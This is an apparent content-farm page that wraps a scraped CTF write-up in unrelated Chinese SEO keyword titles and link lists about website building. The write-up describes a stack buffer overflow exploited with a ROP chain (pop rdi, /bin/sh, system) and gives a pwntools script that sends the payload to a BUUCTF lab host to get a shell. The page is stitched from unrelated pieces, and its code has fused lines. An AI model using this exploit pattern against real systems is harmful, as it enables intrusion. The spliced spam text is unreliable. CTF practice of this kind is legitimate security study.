当前位置: 首页 > wzjs >正文

旅游商城网站建设长沙正规seo优化公司

旅游商城网站建设,长沙正规seo优化公司,长春网站制作价格,石家庄展厅设计公司覆盖缓冲区和 RBP: 使用 128 8 字节覆盖 buf 和 rbp。 构造 ROP 链: pop rdi; ret 地址: 将 pop rdi; ret 指令的地址写入返回地址位置。 /bin/sh 地址: 将 /bin/sh 字符串的地址压入栈顶,作为 system 函数的参数。…
  1. 覆盖缓冲区和 RBP:
    使用 128 + 8 字节覆盖 bufrbp

  2. 构造 ROP 链:

    • pop rdi; ret 地址:pop rdi; ret 指令的地址写入返回地址位置。

    • /bin/sh 地址:/bin/sh 字符串的地址压入栈顶,作为 system 函数的参数。

    • system 地址:system 函数的地址写入返回地址位置。

  3. 执行流程:

    • 子函数返回到 pop rdi; ret 指令,该指令将 /bin/sh 地址出栈并存入 rdi 寄存器。

    • 然后程序返回到 system 函数,执行 system("/bin/sh")


一句话总结:

通过覆盖缓冲区和 RBP,构造 ROP 链(pop rdi; ret/bin/sh 地址 → system 地址),使程序执行 system("/bin/sh"),从而获取 shell。

from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=remote('node5.buuoj.cn',25669)payload=b'a'*(0x88)+p64(0x004006b3)+p64(0x00600A90)+p64(0x004004C0)
p.sendline(payload)
p.interactive()

http://www.dtcms.com/wzjs/355282.html

相关文章:

  • 四川建设厅官方网站证书查询网站建设与网页设计制作
  • 江西航达建设集团网站临沂网站建设优化
  • 肇庆市网站建设网红推广接单平台
  • 微信做模板下载网站有哪些今日国际新闻摘抄
  • 手机端网站建设软文怎么写吸引人
  • 网站做竞价经常会被攻击吗陕西网站设计
  • 长沙优化公司seo自学网官网
  • 重庆旅游网站建设规划网站关键词提升
  • 泰州网站建设团队中国的网络营销公司
  • 网站维护界面设计app推广项目从哪接一手
  • 淘宝内部卷怎么做网站线上销售水果营销方案
  • 常熟响应式网站软文接单平台
  • 做论坛和做网站有什么区别国际新闻最新消息十条摘抄
  • 做视频的软件模板下载网站有哪些内容网络营销工作内容是什么
  • lnmp怎么做网站谷歌地球
  • 鞍山手机网站设计谷歌竞价排名推广公司
  • 13个实用平面设计网站营销软件站
  • 南昌seo排名扣费seo建设者
  • 河北省香河县建设局网站免费发帖推广平台
  • 公司网站建设是什么意思网络优化公司有哪些
  • 东莞有什么比较好的网站公司定制开发公司
  • 1688进货批发网南宁关键词优化公司
  • 网站建设的人才怎么称呼业务推广公司
  • 网站设计的公司叫什么直销怎么做才最快成功
  • 哪些网站seo做的好网络推广策划方案
  • 上传网站内容做网站的软件叫什么
  • 做网站推广价格seo营销策略
  • 中国有几大网站百度最贵关键词排名
  • 做网站从什么做起百度搜索优化怎么做
  • 自动创建wordpress佛山做seo推广公司